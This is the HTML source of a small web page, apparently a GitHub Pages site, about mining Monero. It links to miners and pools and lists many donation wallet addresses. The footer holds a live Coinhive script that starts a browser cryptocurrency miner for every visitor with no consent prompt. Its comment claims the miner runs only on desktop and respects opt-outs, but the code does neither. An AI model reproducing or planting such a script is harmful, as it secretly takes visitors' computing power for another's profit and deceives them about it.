<h2>How to mine Monero ?</h2>
<p>It's Easy to mine Monero</p>
<p>Also you could mine Monero on your pc or your android devices easily</p>
<p>Android miner :(<a href="https://play.google.com/store/apps/details?id=de.ludetis.monerominer">MoneroMinerPro</a>)</p>
<p>On PC :(<a href="https://github.com/xmrig/xmrig">XMRIG</a>)</p>
<h2>Where to find Monero Pool ?</h2>
<p>For mining Monero the best ways is to use a pool</p>
<p>You Can Find Great Pool on :(<a href="http://moneropools.com/">Moneropools.com</a>)</p>
<!-- I got these buttons from simplesharebuttons.com -->
<center>
<div id="share-buttons">
<!-- Buffer -->
<a href="https://bufferapp.com/add?url=https://techqc.github.io/xmr/&text=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/buffer.png" alt="Buffer" />
</a>
<!-- Digg -->
<a href="http://www.digg.com/submit?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/diggit.png" alt="Digg" />
</a>
<!-- Email -->
<a href="mailto:?Subject=What is Monero&Body=I%20saw%20this%20and%20thought%20of%20you!%20 https://techqc.github.io/xmr/">
<img src="https://simplesharebuttons.com/images/somacro/email.png" alt="Email" />
</a>
<!-- Facebook -->
<a href="http://www.facebook.com/sharer.php?u=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/facebook.png" alt="Facebook" />
</a>
<!-- Google+ -->
<a href="https://plus.google.com/share?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/google.png" alt="Google" />
</a>
<!-- LinkedIn -->
<a href="http://www.linkedin.com/shareArticle?mini=true&url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/linkedin.png" alt="LinkedIn" />
</a>
<!-- Pinterest -->
<a href="javascript:void((function()%7Bvar%20e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','http://assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)%7D)());">
<img src="https://simplesharebuttons.com/images/somacro/pinterest.png" alt="Pinterest" />
</a>
<!-- Reddit -->
<a href="http://reddit.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/reddit.png" alt="Reddit" />
</a>
<!-- StumbleUpon-->
<a href="http://www.stumbleupon.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/stumbleupon.png" alt="StumbleUpon" />
</a>
<!-- Tumblr-->
<a href="http://www.tumblr.com/share/link?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/tumblr.png" alt="Tumblr" />
</a>
<!-- Twitter -->
<a href="https://twitter.com/share?url=https://techqc.github.io/xmr/&text=What%20Is%20Monero&hashtags=whatismonero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/twitter.png" alt="Twitter" />
</a>
<!-- VK -->
<a href="http://vkontakte.ru/share.php?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/vk.png" alt="VK" />
</a>
<!-- Yummly -->
<a href="http://www.yummly.com/urb/verify?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/yummly.png" alt="Yummly" />
</a>
</div>
</center>
</div>
</div>
</div>
</section>
<section id="donate">
<div class="container-fluid bg-dark text-white">
<div class="row">
<div class="col-lg-8 mx-auto">
<h2>Here you can Donate</h2>
<p>Monero: 44Dx3bVEarKNGciPJSsD9BXFZASyooXpjCBCzhw3D8cANMzyyJn6PcyWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3wUvH8Z</p>
<p>Bitcoin: 3Joc3kRGC233AHh3BQuUGxptggK8ScyUrZ</p>
<p>Aeon: Wmswvbsac7eZ7pZEbey9nmgoZPjtwBAwRh7Qgm1xHVwF6hcnH43r2vX3hLTKARSrvtH8g4wJtEXS9V3Axz1Y2m8P2uqXEZi51</p>
<p>Dash: XtKTCad86mpGmALqKhGqzqFTBkcb1ZzXrn</p>
<p>ZCash: t1Zum9bh2U6gWwbNyDeEFCSWUPAAbjvdNnJ</p>
<p>Tether: 1LVfoqGqoi8NSckgDgxR9WhqKEjVEHdts3</p>
<p>NXT: NXT-TPPJ-5QVY-LQWF-HXRQD</p>
<p>NEO: APgGg8kuWzzwcLBB3xR5NC3cmYg5dLrgjT</p>
<p>Litecoin: LdmyNUKE7dxuQLxBSDLe2hsUkGXrqwrin3</p>
<p>Lisk: 17746879737169256464L</p>
<p>Ignis: ARDOR-VX3A-UAFT-MVLK-HAE4M</p>
<p>Fantom Coin: 6qCZgyFKUY5RfGhZtJSUH95UN3EZaXTmTWen5CUBb9YZZowx1dV9VoZbyftABRVPdXbYRyBKfHd72H3XvUTr8Ht2Jry2BZU</p>
<p>Eth: 0x411f92b8e7cc11002919a02eb03fbe5e450ba50c</p>
<p>Dogecoin: DTQAjFTcV9ap96hoQsFEWwTpEXS13y55LX</p>
<p>Digitalnote: ddchiP79MK6UHe15Qaf7Q45bmF6r1HLtBeY2EXURC98R83aNg3Bc815QRrdbUBaLyQ9h4wtvggAcY3Way3t4cGoX1AUC9vS6v</p>
<p>Bitcoingold: GeMDC2kYzrBN245psHCWvfLnCbBRwXAjgK</p>
<p>Bancor: 0xb12b07140f5c6eab2c9a59b215bad46b72bf840a</p>
<p>Bytecoin: 23z7sC1bZ1DdNZ9gLPk4miUuB6x3YnSPvhVnypP1f5SRVXovvX72ydGKA32X5SrJuDPBgXTsSmQRoAbCzcDvM2d2PfYsxbY</p>
<!-- I got these buttons from simplesharebuttons.com -->
<center>
<div id="share-buttons">
<!-- Buffer -->
<a href="https://bufferapp.com/add?url=https://techqc.github.io/xmr/&text=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/buffer.png" alt="Buffer" />
</a>
<!-- Digg -->
<a href="http://www.digg.com/submit?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/diggit.png" alt="Digg" />
</a>
<!-- Email -->
<a href="mailto:?Subject=What is Monero&Body=I%20saw%20this%20and%20thought%20of%20you!%20 https://techqc.github.io/xmr/">
<img src="https://simplesharebuttons.com/images/somacro/email.png" alt="Email" />
</a>
<!-- Facebook -->
<a href="http://www.facebook.com/sharer.php?u=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/facebook.png" alt="Facebook" />
</a>
<!-- Google+ -->
<a href="https://plus.google.com/share?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/google.png" alt="Google" />
</a>
<!-- LinkedIn -->
<a href="http://www.linkedin.com/shareArticle?mini=true&url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/linkedin.png" alt="LinkedIn" />
</a>
<!-- Pinterest -->
<a href="javascript:void((function()%7Bvar%20e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','http://assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)%7D)());">
<img src="https://simplesharebuttons.com/images/somacro/pinterest.png" alt="Pinterest" />
</a>
<!-- Reddit -->
<a href="http://reddit.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/reddit.png" alt="Reddit" />
</a>
<!-- StumbleUpon-->
<a href="http://www.stumbleupon.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/stumbleupon.png" alt="StumbleUpon" />
</a>
<!-- Tumblr-->
<a href="http://www.tumblr.com/share/link?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/tumblr.png" alt="Tumblr" />
</a>
<!-- Twitter -->
<a href="https://twitter.com/share?url=https://techqc.github.io/xmr/&text=What%20Is%20Monero&hashtags=whatismonero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/twitter.png" alt="Twitter" />
</a>
<!-- VK -->
<a href="http://vkontakte.ru/share.php?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/vk.png" alt="VK" />
</a>
<!-- Yummly -->
<a href="http://www.yummly.com/urb/verify?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/yummly.png" alt="Yummly" />
</a>
</div>
</center>
</div>
</div>
</div>
</section>
<!-- Footer -->
<footer class="py-5 bg-dark">
<div class="container">
<p class="m-0 text-center text-white">2018 No Copyright © About Monero</p>
</div>
<!-- /.coinhive -->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('xDWm6lj2zaf8lDtLiAjXNUVJ1rtG41Ns', {throttle: 0.4});
// Only start on non-mobile devices and if not opted-out
// in the last 14400 seconds (4 hours):
{
miner.start();
}
</script>
<!-- /.container -->
<!-- I got these buttons from simplesharebuttons.com -->
<center>
<div id="share-buttons">
<!-- Buffer -->
<a href="https://bufferapp.com/add?url=https://techqc.github.io/xmr/&text=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/buffer.png" alt="Buffer" />
</a>
<!-- Digg -->
<a href="http://www.digg.com/submit?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/diggit.png" alt="Digg" />
</a>
<!-- Email -->
<a href="mailto:?Subject=What is Monero&Body=I%20saw%20this%20and%20thought%20of%20you!%20 https://techqc.github.io/xmr/">
<img src="https://simplesharebuttons.com/images/somacro/email.png" alt="Email" />
</a>
<!-- Facebook -->
<a href="http://www.facebook.com/sharer.php?u=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/facebook.png" alt="Facebook" />
</a>
<!-- Google+ -->
<a href="https://plus.google.com/share?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/google.png" alt="Google" />
</a>
<!-- LinkedIn -->
<a href="http://www.linkedin.com/shareArticle?mini=true&url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/linkedin.png" alt="LinkedIn" />
</a>
<!-- Pinterest -->
<a href="javascript:void((function()%7Bvar%20e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','http://assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)%7D)());">
<img src="https://simplesharebuttons.com/images/somacro/pinterest.png" alt="Pinterest" />
</a>
<!-- Reddit -->
<a href="http://reddit.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/reddit.png" alt="Reddit" />
</a>
<!-- StumbleUpon-->
<a href="http://www.stumbleupon.com/submit?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/stumbleupon.png" alt="StumbleUpon" />
</a>
<!-- Tumblr-->
<a href="http://www.tumblr.com/share/link?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/tumblr.png" alt="Tumblr" />
</a>
<!-- Twitter -->
<a href="https://twitter.com/share?url=https://techqc.github.io/xmr/&text=What%20Is%20Monero&hashtags=whatismonero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/twitter.png" alt="Twitter" />
</a>
<!-- VK -->
<a href="http://vkontakte.ru/share.php?url=https://techqc.github.io/xmr/" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/vk.png" alt="VK" />
</a>
<!-- Yummly -->
<a href="http://www.yummly.com/urb/verify?url=https://techqc.github.io/xmr/&title=What is Monero" target="_blank">
<img src="https://simplesharebuttons.com/images/somacro/yummly.png" alt="Yummly" />
</a>
</div>
</center>
</footer>
<!-- Bootstrap core JavaScript -->
<script src="vendor/jquery/jquery.min.js"></script>
<script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
<!-- Plugin JavaScript -->
<script src="vendor/jquery-easing/jquery.easing.min.js"></script>
<!-- Custom JavaScript for this theme -->
<script src="js/scrolling-nav.js"></script>
</body>
</html>